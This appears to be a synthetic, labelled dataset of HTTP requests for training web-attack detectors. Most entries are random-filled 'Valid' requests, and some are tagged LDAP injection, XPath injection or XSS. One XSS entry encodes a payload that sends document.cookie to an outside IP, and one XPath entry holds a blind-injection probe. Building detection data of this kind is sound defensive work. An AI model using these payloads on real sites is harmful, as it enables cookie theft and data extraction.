aEtrt=3lclladswsincludepasswd|mot&-lSL-style89a=2as&g.servicesA=Tu6blhtbs9u5r&gsystempkqD2_8=gis&N9aorf= o&anwhgz=Tre?having in&srlohICtnebCise=esVZ&if2=9566691&ZhttpsmZ=tnolioeioirhservices&Knejqrtzsdm=lt&re0ncek=ab2roocicaaa&emeqW=qysxI@&dt2aCtseurwxcea=r&sfphlNerz=a1nxlluc&0enllipe9=>;d

End - Id: 5065
Start - Id: 37391
class: LdapInjection
GET /sr1eheAQ/DxeTotOmds1tuntceviu/1z/6GVs/a2jGBPG0hYvrN1w.rm/d4Cl/ipPrb/hhtwlnteaee.tiff?jeln8Eua=tsi&otn=to4Se1eoto9tiqT&eo=+&DttaRo3sorcu9i=803396470&eas6y=468 HTTP/1.1
Host: 144.29.217.32
Connection: 9sZ9dtfr
Accept: image/png, image/png;q=0.9, application/*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: trepft-Am
Cache-Control: no-store
Cookie: rhxuhg8se=vootae;hr3aiTatNel=tocaednfgonh
Cookie2: $Version="3"
Date: Thu, 08 May 08 23:52:29 CET
ETag: W/"WKZgPV22yOjLYYvu-I"
Expect: ron5eh
If-Modified-Since: Tue, 22 Dec 09 03:35:15 CET
If-Unmodified-Since: Fri, 11 Mar 05 10:51:02 GMT
If-Match: *
If-None-Match: "ZrteGa33_COudmjA"
If-Range: Mon, 05 Sep 05 06:02:19 GMT
Max-Forwards: 40
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: lmrt hidHn3=naUlw
Authorization: NTLM ZVRlbHZBN2Z2aEdnd2hubmVhSHJtdkxlOGh6bmE5aHpHZHN0bXdkMm5vd0Vjemk=
Referer: http://delc.fr/XNeo0d/ubrj0/ioowa/fnSnr4Dk.exe
Trailer: If-None-Match
User-Agent: tR)(   |   (tTp=*)
UA-CPU: 68000
UA-Pixels: 7518x4313
Via: 8.6 124.69.254.112, 8.9 233.92.92.213, 6.7 119.132.139.127:86237
Transfer-Encoding: deflate
Warning: 726 www.alzEot.jpeg:23 "gqmreharuon8ber" "Wed, 20 May 09 09:50:37 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37391
Start - Id: 10470
class: Valid
GET /nnTtnuit/e77lCayBNr/p_Q/eluisanthwn3r3ce8ncF/nekinia/eEjF7xrdj/rIXNjdYuret/ecz/zvX/fcoij2.mspx?UD0ea.Qkk=wtlJpel7oeu9mp&t8h=ahcn+&Sj5nSexec8TN=+AfbEea HTTP/1.0
Host: 64.134.254.132
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-roman;q=0.1, x-mac-roman;q=0.2, iso-8859-7;q=0.4, iso-8859-6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 234.79.172.175
Cookie: zkwennLnsz6emeu=074543
Cookie2: $Version="443"
Date: Sun, 14 Feb 10 14:24:47 UTC
ETag: "o4hTUNKQt9lVw62b4Tjs"
Expect: 100-continue
From: UiyEh@beTesadq.com
If-Modified-Since: Wed, 19 Dec 07 11:48:05 CET
If-Unmodified-Since: Wed, 09 Apr 08 10:21:09 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 340
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM c0lwRGFJb2x0bTNkdGVlRXJleTFwc2Zoc2VzbXZuN3IyeHRubA==
Authorization: NTLM dEVucGJucjRvNWNoNW82YW9xZjltaW9kcW9oaXpmcG53ZWVha2k=
Range: 5-1,96994-671,51284-
Referer: http://iCro7dte.de/seiSenC/tTrsl3/eite/lana.txt
TE: trailers,trailers,chunked;q=0.2
Trailer: Via
User-Agent: Mozilla/6.0 (X11; U; Linux i586 3.5; re-Io; rv:0.3.4) Gecko/87032304
UA-CPU: StrongARM
UA-Disp: 4955,848,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 747x1672
Via: slv7/2.5 www.DTec.htm
Transfer-Encoding: compress
Upgrade: ctah/6.6, Rtzei/0.4, fl4/6.0, eofhle/5.9, 7euoNe/5.2
Warning: 079 207.58.135.243:6637 "lldeeiya7z2nb" "Sat, 20 Mar 04 17:46:02 CET"
X-Forwarded-For: 153.53.63.108
X-Serial-Number: 23963701086419023023
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10470
Start - Id: 1142
class: Valid
GET /naetisrti4R/a.lYJJL@QTYq5tJ0SS/9nnNbeEdnlneAa/SY57exec76sPZLYZh/tte/inxY4Y5Js.P_w9nLZ/bJTc/yAui/tezNylarpozysetgys.gif?aiaavaensa=xortx+ihlaVexecaihtpass%3Et&stdintRtid=j%3Ephp&wegLeghi=mdnss4vrisaG&ke6Oeed6ys3v=topCcn0hta0nriB&wtc1idhBc=aOSpfWaSitoM8oOTh&zz.inT7xKs9O=iliS9s2hhebn&azionrJcaia=n8wigi49hdrv%24&455htnoihny=34263&aho=otc&cb=4eevel8motycc8&nol5ooeprurh=xaoytyaoil6a2 HTTP/1.0
Host: www.hnst.be:80
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: Syqm2n-iaaA8lhy, neaN-1roius, ksimi1ts-e, tei-ntlrc;q=0.7
Cache-Control: no-transform
Client-ip: 179.51.230.218
Cookie: ehaen=2liennoede3nrc;apy=g_7Vbrk8;UXH2L=6;4eijntrad=9362617;rtmpe55=44
Cookie2: $Version="626"
Date: Fri, 12 Oct 07 09:56:25 UTC
ETag: W/"bdQdKseS4xXCxFZ0G"
Expect: nhDardk=aRxp7ou;lirce=Ie3mus
From: 7nAao@xchnNanrsu.be
If-Modified-Since: Tue, 27 Nov 07 16:21:36 UTC
If-Unmodified-Since: Sun, 21 Aug 05 10:16:47 GMT
If-Match: *
If-None-Match: "uptWeLY@pdMPBA3v"
If-Range: "AySOfoMQcrE5gcx"
Max-Forwards: 974
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest username="neou"
Authorization: NTLM YVRXZWhiZUd0b3VkbHdwZXI5dHlkYWlyaXRqc2F3VW5pZQ==
Range: 6-
Referer: http://rkho5.fr/ewhe0cd.pdf
TE: chunked,deflate;q=0.0,deflate
Trailer: If-Unmodified-Since
User-Agent: 0Ef5J0D9R http://www.epchndhq.de
UA-CPU: PowerPC
UA-Disp: 111,7924,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2688x3357
Via: HTTP/7.5 www.peeoaieH.htm, herN/7.3 www.1pci.gif:72
Transfer-Encoding: deflate
Upgrade: nah/6.7
Warning: 320 www.heethnz.jpg "deaI" "Tue, 17 Aug 04 13:45:02 UTC"
X-Forwarded-For: 174.219.186.109
X-Serial-Number: 2559781115127
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1142
Start - Id: 1025
class: Valid
GET /aizqEWePW9k5eXM/XXQ4LOhWEG_/Cf/3biya/enaaetrg0retELou/Xt/divO1RcmdNO86betweenLo/wwggdrents7naJ3tphvy/etfheednlT0.nsf?e6enlm4EnuaAii=eMidoIcS&8xterm1bBzMFUC-=3btg9e7ieeubt4JNj&admin2tsRv.._Vzs=saccess_logmsehtyea%28ev%3Ct%26b&h2qeigEn6ideahq=Tt0natkdnnehoT&dioyh0tsawnvhn=72&ageq=2451187&eiRSEeifoo=8&@LTscriptdropz=oIphpagf5%2Fuhc&rcpQnode_OselectnmrcpBRU=iagEee9+Hlli&reiekb=ns6ca&ote8t=+whomen&XOC-=obl%28nlscript HTTP/1.0
Host: 149.186.187.48
Connection: keep-alive
Accept: audio/x-wav
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.9, deflate, deflate
Accept-Language: *;q=0.0
Cache-Control: max-age=341
Client-ip: 147.230.207.208
Cookie: arjc3oehnee=sqmlon6Cd0En;EsireAo=S;pxAsnnrhhpans=27312
Cookie2: $Version="5"
Date: Mon, 26 Sep 05 10:19:02 GMT
ETag: "guQP-vgLmi_nEuJ8"
Expect: rfgminow=esd5ti;hfoor=rhnhnie
From: iyiqd@OJte.cz
If-Modified-Since: Fri, 12 Aug 05 16:32:48 UTC
If-Unmodified-Since: Sun, 31 May 09 22:13:20 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 09
MIME-Version: 8.6
Pragma: jsrmt='N'
Proxy-Authorization: NTLM ZXRkaFRwOGxkZWczaTdkODZsUzlzdGljamxhTmxhMTRyc2VvYXRjb2xuYWl3
Authorization: Basic Zm5tZGRod2k6czNwZQ==
Range: 339-65412,180-85,-47
Referer: /i3NT/vhateAsu/tadii.wav
TE: deflate,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/2.8 (compatible; aAetc6l; SunOS sun4u; eeo7E)
UA-CPU: MIPS
UA-Disp: 108,3114,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5033x777
Via: FTP/4.4 87.28.56.76
Transfer-Encoding: gzip
Upgrade: Rhhtb/3.6, ren/5.0, rt9em/3.6, nixTd/5.6, oeeAEo/3.8
Warning: 645 153.196.97.71:9 "3Eh9r9qmo" "Sun, 18 Jun 06 20:12:04 GMT"
X-Forwarded-For: 162.75.24.52
X-Serial-Number: 20805
----: ---------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 1025
Start - Id: 7085
class: Valid
POST /b9uDgroup by0/nAw6EFSZbBF1_V30g9p/i9cjeneo/5gtCAnseygen0tem/hh8ix-nOj@UcC9/sekhEdnajtdaizmYnRe/lwti.jpeg? HTTP/1.1
Content-Length: 28
Content-Language: srhsoea
Content-Encoding: deflate
Content-Location: http://YmcOAu.gov/quttb/n3sy.tiff
Content-MD5: aW1vZWxJc3QzZG5kYWEyYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 26 Dec 08 19:31:16 UTC
Last-Modified: Fri, 27 Apr 07 12:56:34 UTC
Host: 160.29.147.124
Connection: close
Accept: image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=96443
Client-ip: 158.140.59.213
Cookie: locationlBKOIautoexecQc-=9535
Cookie2: $Version="672"
Date: Fri, 30 Oct 09 11:37:30 CET
ETag: "f9KKuJ.wAeQLiZx0z"
Expect: 100-continue
From: eEx8b3N@3msi.ch
If-Modified-Since: Thu, 10 Feb 05 20:32:22 CET
If-Unmodified-Since: Mon, 05 Mar 07 17:02:43 CET
If-Match: *
If-None-Match: "3gk2X4knjvRBFKPg3W@"
If-Range: Sat, 31 Jan 09 22:59:12 CET
Max-Forwards: 80
MIME-Version: 0.4
Pragma: e='slmnoic'
Proxy-Authorization: Digest nonce
Authorization: Basic OGY1MjpydXk3d24=
Range: 831-,5-,9058-
Referer: /wngmia/xzaires.doc
TE: trailers,gzip
Trailer: Range
User-Agent: Mozilla/2.4 (compatible; Konqueror/9.2; Unix; dsgHur66; 9u1erh0rVh; r28ia)
UA-CPU: x86
UA-Disp: 5151,1845,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6819x838
Via: gau/0.0 www.ttElb8y.htm, 2.8 www.LI0ooieh.gif
Transfer-Encoding: identity
Upgrade: soto/1.7, tbon/1.6, neyvo/0.0, d8xla8/5.4
Warning: 808 www.x48r.shtml:7274 "tnIt3bfr2a" 
X-Forwarded-For: 60.44.207.26
X-Serial-Number: 317162195276859
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

uneb5r2ttsvNrlo=ngph&tce=aed

End - Id: 7085
Start - Id: 30147
class: Valid
GET /seCtZdhtqikgsesa/8gHAto/lh1e2qsedhSkR/o4ZGbNWl/o9Bz_-F.FVePK81O0m/l-8RsrHI4JUfvc4NxA.css?zsco1=iqAId&3jaamoan4nihia=atr&httimsewyzhuv=Aea&Tqurf=Rraeaetc%28isTdrvci0openi0var&inatN0tosbery=7542423&eiiatpoene=c5&ht1tcjetgcyi=3&1htpassRzDsSFcT=Crgn HTTP/1.1
Host: www.i8ahssour.org:80
Connection: close
Accept: video/*;q=0.3, text/*;q=0.7, application/postscript;q=0.0
Accept-Charset: iso-2022-jp, utf-7;q=0.9, x-mac-icelandic, windows-1252;q=0.5, euc-jp;q=0.2
Accept-Encoding: 
Accept-Language: vrfdsa-5fo, 0fketfLl-uxuhCkh;q=0.1, ahocs-dniof;q=0.9
Cache-Control: no-transform
Client-ip: 146.181.60.5
Cookie: 9p8echoC=sss9H;rmt_p4=kd29;c8slTemize1icn=yWoeidwov;ja1oTm=fap
Cookie2: $Version="894"
Date: Mon, 01 Mar 10 13:41:05 CET
ETag: "Z97TX15WV4@NMd0S"
Expect: hbts9R=aslded;xqpz
From: belb2r@zati.biz
If-Modified-Since: Sun, 18 Dec 05 01:29:40 UTC
If-Unmodified-Since: Sat, 08 Nov 08 10:26:25 CET
If-Match: "Q01im@GZFxcZA0@xN@"
If-None-Match: *
If-Range: *
Max-Forwards: 29
MIME-Version: 4.6
Pragma: go0ao9oa='spynoLee'
Proxy-Authorization: Basic dDJyb2VuOm9zYnRh
Authorization: NTLM VWM0bGVlZGd0bm1zcWllZnRuZU1lWGFlb2lzanZkZU1mYm50dGhpaGVjZGk=
Range: 876-71883
Referer: http://www.shoe.cz/Tptn/n2r43wos/8a2li/tense.pdf
TE: trailers
Trailer: Upgrade
User-Agent: tsilnN
UA-CPU: Sparc
UA-Disp: 257,0246,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 488x0113
Via: HTTP/9.8 www.oxt73l.gif, 1.0 199.114.251.74, HTTP/0.9 17.178.93.238
Transfer-Encoding: gzip
Upgrade: eneor/3.9, enodo/5.9
Warning: 949 87.230.32.41 "do1d6" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 7148566878920478755
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30147
Start - Id: 32589
class: Valid
PUT /nXu46X/lP/jg30lec/a3F34H1Yt_-gzFED/eEbX4JCG5L/s3smueeUganrluovnsyc/hrncNRvtejzertuFuetI/dbHiDEutaphEttRtmnt/4isVBK38h/lxlLgKjRr/eiHsAeoherw.htm? HTTP/1.0
Content-Length: 62
Content-Language: bunhe
Content-Encoding: compress
Content-Location: /Sbioed/ehehT/th3ot/bktibc/vmr7psyi.shtml
Content-MD5: bmRtc2JpdG9uYmlEdHlldA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Mar 10 19:38:19 CET
Last-Modified: Sun, 13 Apr 08 11:15:52 GMT
Host: 9.40.75.51:80
Connection: pw1SvsbI
Accept: video/*, text/html, audio/*
Accept-Charset: iso-8859-1;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 87.137.200.16
Cookie: WVvkd=496;senei9oCts=&shutdownzAstmW;ncer7oua6jemzep=xailocationyem 6Efn5bn<eutmp
Cookie2: $Version="27"
Date: Tue, 28 Jul 09 09:01:22 CET
ETag: W/"UBd-YD3yBR8E8TwJERN"
Expect: 100-continue
If-Modified-Since: Tue, 07 Dec 04 17:41:31 UTC
If-Unmodified-Since: Thu, 17 Jul 08 02:14:52 UTC
If-Match: *
If-None-Match: "zP7e.c@sfzoG7Kk"
If-Range: Sun, 18 Dec 05 16:40:18 CET
Max-Forwards: 8171
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: ttuo3 keteeat=beezene1
Authorization: Digest username="erqbtas"
Range: -619576,782-7
Referer: /thierE/cKzLbstn/aldphik/squbto.swf
TE: trailers,deflate;q=0.3
Trailer: Accept-Charset
User-Agent: Mozilla/2.9 (compatible; Konqueror/7.9; Win98; Oa8aouewts)
UA-CPU: Sparc
UA-Disp: 282,0738,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 744x9728
Via: 5.1 www.eqabet.html, 5.1 193.69.55.18
Transfer-Encoding: deflate
Upgrade: fim4i/1.8, mvMta/2.8, jo9ve/6.8
Warning: 560 61.58.173.87 "aNahir0tmoon5em" 
X-Forwarded-For: 64.19.200.199
X-Serial-Number: 34552
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hme=enstlip2hewru&nrtetthlanolMl3=ef4dteA9d9&atxneh1=3ejmowtnr

End - Id: 32589
Start - Id: 11235
class: Valid
GET /i1Dj2_-5-b7ktJ/c3eo/h-/idQS/I9nfvxNF/yaeqocsihaaoq/ohtt3ced/e1T62Ro_/hPI/0i3MWyFO8jX/t0g2@9Mz/iTTD@wI2jxb8U.dll?lnmtiAtdi=2&O9gm9Zr=411472&kils4=rJHm&Goaa=%3A2ET77+n2byrElQ&osyRswIf=2955&5th5eeno=copyhwe&4Sotroibtzihioa=244&rneLxwo=hEhRNp0&4saml=caln&ritsce3=1682&rj69iveaj5s=899318&gaaeo=s4u&it=e6&rddhvsfjetc0o=a0A%40Es3 HTTP/1.1
Host: 6.159.139.184
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.6, deflate, identity, gzip;q=0.7
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 12.185.108.4
Cookie: 3WmlognsOT=61237
Cookie2: $Version="68"
Date: Tue, 22 Jan 08 21:10:55 GMT
ETag: "TE11mvbXzB-pOhLld"
Expect: 100-continue
From: aarli@mLmeltu.be
If-Modified-Since: Sun, 26 Aug 07 11:14:52 UTC
If-Unmodified-Since: Wed, 18 Feb 09 08:46:36 GMT
If-Match: "Sv0QPZFm.svW8BTN7zX"
If-None-Match: *
If-Range: Wed, 24 Feb 10 19:12:59 CET
Max-Forwards: 62
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: bAGo Oiw9tsc=oisdaoot
Authorization: Digest algorithm=MD5-sess
Range: 04605-
Referer: http://1Selhnt.de/leaa/fsr4Es3q/ofr7/hdn6/iei8spby.gif
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: Mozilla/4.9 (Machintosh; U; PPC Mac OS X 6.9; su-sh; rv:9.1.6) Gecko/38464815
UA-CPU: PowerPC
UA-Disp: 207,8644,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 898x128
Via: 0.6 197.62.65.246:00, 7.0 www.aoan.tiff, FTP/4.3 www.saim.htm:5
Transfer-Encoding: compress
Upgrade: uCt/3.1
Warning: 482 www.nt5e.js "raopnnI2epacwex" "Sun, 04 Jan 04 12:41:28 CET"
X-Forwarded-For: 175.7.223.209
X-Serial-Number: 450563801661696804
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 11235
Start - Id: 25365
class: Valid
GET /tST_TmzPWrGx.png?cfnetcat5sLOZZbf=6&rijplaz7hvgoA=rvNDoioTIpwame8n&urYfWba=8&5ntlaenA8seE89t=hGl&3ov5ttteiiAl3=dlatcdeur02&toI1bgncc=i.WVmuX35p&ItEGPvfC=systema&aechoof_=e1Ku HTTP/1.1
Host: 84.98.248.190
Connection: keep-alive
Accept: application/postscript
Accept-Charset: *
Accept-Encoding: 
Accept-Language: TlleAmnz-uai88, gieta-j;q=0.9, nsek-9;q=0.7, A-nip;q=0.4, i6-a;q=0.3
Cache-Control: no-transform
Client-ip: 32.69.89.64
Cookie: sa=156374500
Cookie2: $Version="1"
Date: Mon, 15 Sep 08 12:00:13 GMT
ETag: W/"CHOpfeJaTcF38M2su0"
Expect: tYps
From: iaomoX@nnxktO8Iw.org
If-Modified-Since: Thu, 07 May 09 13:23:35 GMT
If-Unmodified-Since: Thu, 20 Mar 08 12:48:00 GMT
If-Match: "CvRFDZ8IWS7-X5FC2"
If-None-Match: *
If-Range: *
Max-Forwards: 0310
MIME-Version: 6.1
Pragma: etct0p5='tsseA'
Proxy-Authorization: Basic b2FhaHVpZzpnMG5pdGhocg==
Authorization: href n8eiba=no8gf
Range: 4947-
Referer: /rnio/Dzda/6stud29/s7vabno.jsp
TE: chunked,trailers
Trailer: Authorization
User-Agent: Mozilla/8.6 (Machintosh; U; Mac OS X 2.6; ln-Ao; rv:5.6.7) Gecko/53734714
UA-CPU: 68000
UA-Disp: 761,7667,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 894x439
Via: FTP/9.5 www.aMDa.shtml
Transfer-Encoding: identity
Upgrade: mAfhy/1.2, miweeu/5.9, cro/2.3, escale/8.3
Warning: 912 www.oae7p.js "tows0eecop" "Sun, 06 Nov 05 24:11:34 UTC"
X-Forwarded-For: 151.104.112.233
X-Serial-Number: 29493838100482691776
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25365
Start - Id: 47527
class: XSS
GET /e3bG/ph1L/iti_uEoKPpO5X6.@/mD1sGD-QpC8U/kxFHT3-TZV.htm?uobz8eg=odxhzaHbper-jwinnt&oz3Ak3nlIu=9982276&7aoagl=384&onto=e8he%24Eord%2Bda1hn%3C&eTyadr5rs2xah=ailr&c-E@C=yBhdoys%7EsaT&S75sJX=dOl6&ehnui=%2B&dpee9=ssr%3Diaccess_log&apa5ndW1lASek=%3Cimg+++dynsrc%3D+++%22+++++javascript%3A+++%5Bwindow.open%28%27http%3A%2F%2F32.124.77.193%2For.sh%27%2Bdocument.cookie%29%3B%5D+++%22+%3E&Eatootdprcjt=57573059&enep=7dnee&ntmanoevraei=cLhn&llTtnlehl0at=676802558 HTTP/1.0
Host: 18.113.194.152:574
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.1
Cache-Control: 3='f'
Client-ip: 2.40.61.206
Cookie: GV2iVo=32399957;aAidr0y=1871713;passwdG7DRMQMsamxp_cb=47;mfabrnt3s= tswinntr'l;.ERUcfX=16948
Cookie2: $Version="681"
Date: Fri, 30 Apr 10 20:41:12 CET
ETag: W/"-gXHqWTuyFHb9trO"
Expect: mAnknsm
From: eieolton@oosl.de
If-Modified-Since: Thu, 18 Dec 08 18:01:56 UTC
If-Unmodified-Since: Thu, 19 May 05 11:25:33 GMT
If-Match: "iRCYsYMcqOqgKk6wpaD"
If-None-Match: *
If-Range: "xsSLm8RVhjdXiTs"
Max-Forwards: 0
MIME-Version: 0.2
Pragma: itb=s
Proxy-Authorization: Basic RWhzaWU6b05ub2U=
Authorization: Basic bExubmdlOkNucmllT2V1
Range: 924-,916951-
Referer: http://eeaPhdb.it/lapt0D/8Hcegeir/rTydru/nemse0/zohY.asp
TE: gzip;q=0.6,deflate;q=0.8,trailers
Trailer: TE
User-Agent: ite7umte6Y
UA-CPU: PowerPC
UA-Disp: 0811,223,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 2187x3503
Via: eoihaa/6.5 101.236.164.179:489, niToxi/7.1 216.242.227.168, HTTP/2.2 www.otleetc9.htm:1293
Transfer-Encoding: compress
Upgrade: atsa/8.3
Warning: 191 69.38.217.187 "aooiItwaeofvrttacyi" "Thu, 28 Sep 06 12:38:57 UTC"
X-Forwarded-For: 119.148.205.131
X-Serial-Number: 870651819
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47527
Start - Id: 985
class: Valid
GET /snGf8yOg/wU4kKdtCBo7/eaQYa-dwH/lovQK@FCUMeq2Wrad/sFw9ulbetgMq9xqx7A_.jpg?tsddsuotr2rise=169385&a0tns8eeera=odijy&t3seuoei97=839397&hc4ESn=te5o&revj=js1lh+sb&snmtpT=aEX_kFf19lF. HTTP/1.0
Host: www.genxdu.com
Connection: 4iorEEn
Accept: audio/basic;q=0.5, text/*;q=0.6, text/*;q=0.9
Accept-Charset: iso-2022-kr, us-ascii, iso-8859-1;q=0.2, x-mac-arabic;q=0.8, iso-10646-ucs-2;q=0.4
Accept-Encoding: 
Accept-Language: aodHqwe-wewcb;q=0.7, etrtj-nClt, eAo-eapuLnh;q=0.9, efeIe-j, s-vnisre
Cache-Control: no-cache
Client-ip: 217.254.156.116
Cookie: hn=em9gPeooiipH3sys;22cneGcemaircE=0q;nstyieuioEcsn=ie_m1e
Cookie2: $Version="8"
Date: Fri, 03 Sep 04 02:35:33 CET
ETag: "Mer1_7@4tgo85p@"
Expect: venose
From: 8Icl@jihmnh.ch
If-Modified-Since: Sun, 25 Apr 04 14:22:25 CET
If-Unmodified-Since: Tue, 02 Mar 04 16:28:24 CET
If-Match: "Di0eYkeRJ76bLevy"
If-None-Match: "tH3YWcwJiBpyBLb"
If-Range: "@aRbVyxxF9v4kJXMB8"
Max-Forwards: 916
MIME-Version: 7.0
Pragma: endytAas=MOr
Proxy-Authorization: amit hx71ti9=tovd
Authorization: NTLM MHdodGYybkJuR21hdG1tbjIzdmVlM3N0YWZzcWxvc3NscmI4YW95dGl1bnM=
Range: 726319-,933-
Referer: http://www.ntfcQ6.fr/xhniv/ahihitI/hxer/ntetidDa.css
TE: gzip
Trailer: Cache-Control
User-Agent: qare/4.4.3.8.6
UA-CPU: MIPS
UA-Disp: 419,762,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 873x994
Via: tOwrel/0.5 25.74.176.242, 1.6 215.171.238.80, 3.0 229.189.184.40
Transfer-Encoding: identity
Upgrade: leosx/9.3, dydAd/3.3, attwi/4.3, oohdna/7.5, a1gooc/3.7
Warning: 489 28.201.135.102 "oeblo5shaei" 
X-Forwarded-For: 162.75.24.52
X-Serial-Number: 045784
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 985
Start - Id: 35808
class: XPathInjection
GET /kmrem/pTa/6IUcuu_hKmDFGJhih/o0SZrmKoGVh9mROz1D/saardgr60odegrvleCrr/jM.htm?hi=edieeycs%3Dssoe5&odeabhfSs05me=seneoTr&Q@includedconnectRZyFGWq=817+++or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C+++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+++++65226%3D HTTP/1.1
Host: 122.22.4.104
Connection: 8urtyNha
Accept: application/zip, text/*;q=0.6, text/plain
Accept-Charset: windows-1252;q=0.5, cp-950;q=0.3, x-mac-japanese
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 25.4.155.47
Cookie: Kx5qtelnetHGD=dnte
Cookie2: $Version="52"
Date: Fri, 01 Jan 10 19:45:35 CET
ETag: "LurqXpLgf.Ql2zH"
Expect: ntmt9A
From: gH0ez@Sireoah.fr
If-Modified-Since: Sun, 02 May 10 10:38:04 GMT
If-Unmodified-Since: Mon, 30 Aug 04 10:26:00 CET
If-Match: "juhBjy0vAF6LU8iDRZ"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 1.7
Pragma: txP=lostFv
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Digest nc=007C8aF6
Range: 205-0247
Referer: /shennp.js
TE: deflate;q=0.1
Trailer: If-None-Match
User-Agent: rteeror6/0.8.1.1.1
UA-CPU: x86
UA-Disp: 861,959,8
UA-OS: WinNT
UA-Pixels: 4135x5853
Via: 0.7 97.3.176.16
Transfer-Encoding: compress
Upgrade: hljiT/5.4, axrst/8.8
Warning: 282 www.eOXt.htm "312bFgsaSoacoe" 
X-Forwarded-For: 43.11.206.228
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35808
Start - Id: 37546
class: LdapInjection
POST /euCQH/gLrOx5bLrevgr/t9vVDA1TWxJauAwCi/b7/1Rxwocijstms/C5zCwrmZAOtcnB/rIMvnuNLiIzIMnBP/a6cns9lT4ttos6ifyemh/embh6U/e3Nww/zlaLaefcio1inrno0w/einor8e6heyncHpos.php? HTTP/1.0
Content-Length: 133
Content-Language: n,annxx
Content-Encoding: identity
Content-Location: /s6dikn/umcaw/l9Oe/o6amcyT/tife.png
Content-MD5: dWt0OWNxYWFvY2V3anNlbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Oct 07 19:40:03 CET
Last-Modified: Tue, 14 Mar 06 23:41:22 GMT
Host: 75.36.217.28
Connection: rolGkt
Accept: image/*;q=0.6, audio/basic
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: zaO=sio4
Client-ip: 128.166.47.177
Cookie: window.openNtSc4._1=0380418;unroe86s8a=en;begnoatnp=496128;ogbOHctn=dCr]e6ii8al;aee2eh2eet=05;qsa4Uet=8
Cookie2: $Version="00"
Date: Thu, 24 Jul 08 22:30:04 UTC
ETag: W/"7fYEeeHR2qFRIAZreRVc"
Expect: 3hainp=yeeT
From: nIt1h@rvrs.org
If-Modified-Since: Wed, 24 Oct 07 05:04:22 UTC
If-Unmodified-Since: Wed, 28 Jun 06 12:32:32 UTC
If-Match: "5HrHWNqt-vzBcgI8"
If-None-Match: "FfXz0MQlWO0Py95pXt"
If-Range: "H_oMizhNmQ6MKBEAYj"
Max-Forwards: 6
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM MWh3dWdhbzRnbFRudnVqZmpiRWxsbmgzZHMwd2IyZWZsZWVuaEpkb25jcWdFTnV0
Authorization: NTLM emxsb2Rhc3FjOWVuZHRiZGp0eVNpdHlzZGUxc2k0c3JSaW8wZXc=
Range: 0516-7855,069180-,334-
Referer: /7kbh/xtlr.nsf
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.0 (X11; U; Solaris 5.0; ao-ad; rv:4.2.9) Gecko/76098616
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 523x786
